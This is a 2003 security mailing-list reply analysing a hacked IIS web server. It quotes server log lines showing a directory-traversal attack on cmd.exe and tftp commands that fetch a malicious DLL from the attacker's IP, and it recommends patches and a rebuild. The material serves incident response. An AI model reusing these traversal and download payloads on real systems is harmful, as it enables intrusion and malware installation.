Security Incidents mailing list archives
Re: Hacked web server
From: Michael Katz <mike () procinct com>
Date: Sun, 12 Jan 2003 18:20:12 -0800
At 1/10/2003 12:39 PM, Rogelio Vidaurri Courcelle wrote:
Hi... my web server (NT 4.0 SP6a) was hacked last friday
Rogelio,
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 96, 8201, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
The above shows that your server is susceptible to a vulnerability detailed in Microsoft Security Bulletin MS00-057 (http://www.microsoft.com/technet/security/bulletin/ms00-057.asp). This vulnerability is NOT fixed by Service Pack 6a. You need to install additional patches for IIS. When you rebuild the server, you should install the cumulative IIS patch described in Microsoft Security Bulletin MS02-062 (http://www.microsoft.com/technet/security/bulletin/ms02-062.asp)
200.38.237.2, -, 5/01/03, 4:15:09, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20c:\httpodbc.dll, 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20d:\httpodbc.dll, 200.38.237.2, -, 5/01/03, 4:15:10, W3SVC, INGRESOS02, 200.38.152.221, 125, 152, 369, 200, 0, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+tftp%20-i%20200.38.237.2%20GET%20cool.dll%20e:\httpodbc.dll,
Your failure to find a virus (httpodbc.dll) on your hard disk may indicate that your firewall was configured properly or that antivirus software prevented the infected file from being written to your hard disk (if you had antivirus software with relatively current definitions). However, there are plenty of other bad things that could be on your system that attackers could have placed on your system that would not be flagged as malware by antivirus software.
i have read that it could be because of Nimda but i have scanned with the latest pattern and it found no viruses... only a backdoor trojan called ncx99.exe dropped in mailroot\drop\temp by the way, can i delete files inside that folder??? there's a rundlls32.exe... a KEY file, etcetera......
ncx99.exe is most likely a modified version of netcat and is not flagged by most antivirus software as malware.
If your machine has been configured this way for two months, you should rebuild it and start from scratch. Who knows what attackers may have done to your system?
Michael Katz mike () procinct comProcinct Security
---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service.For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
Current thread:
- Hacked web server Rogelio Vidaurri Courcelle (Jan 12)
- Re: Hacked web server Tibor Biro (Jan 12)
- Re: Hacked web server Michael Katz (Jan 12)
- Re: Hacked web server sunzi (Jan 14)
- RE: Hacked web server Michael LaSalvia (Jan 15)
- Re: Hacked web server Ryan Yagatich (Jan 21)
- RE: Hacked web server Jason Coombs (Jan 23)
- RE: Hacked web server Ryan Yagatich (Jan 25)
- RE: Hacked web server Jason Coombs (Jan 23)
- <Possible follow-ups>
- Re: Hacked web server John Pugh (Jan 23)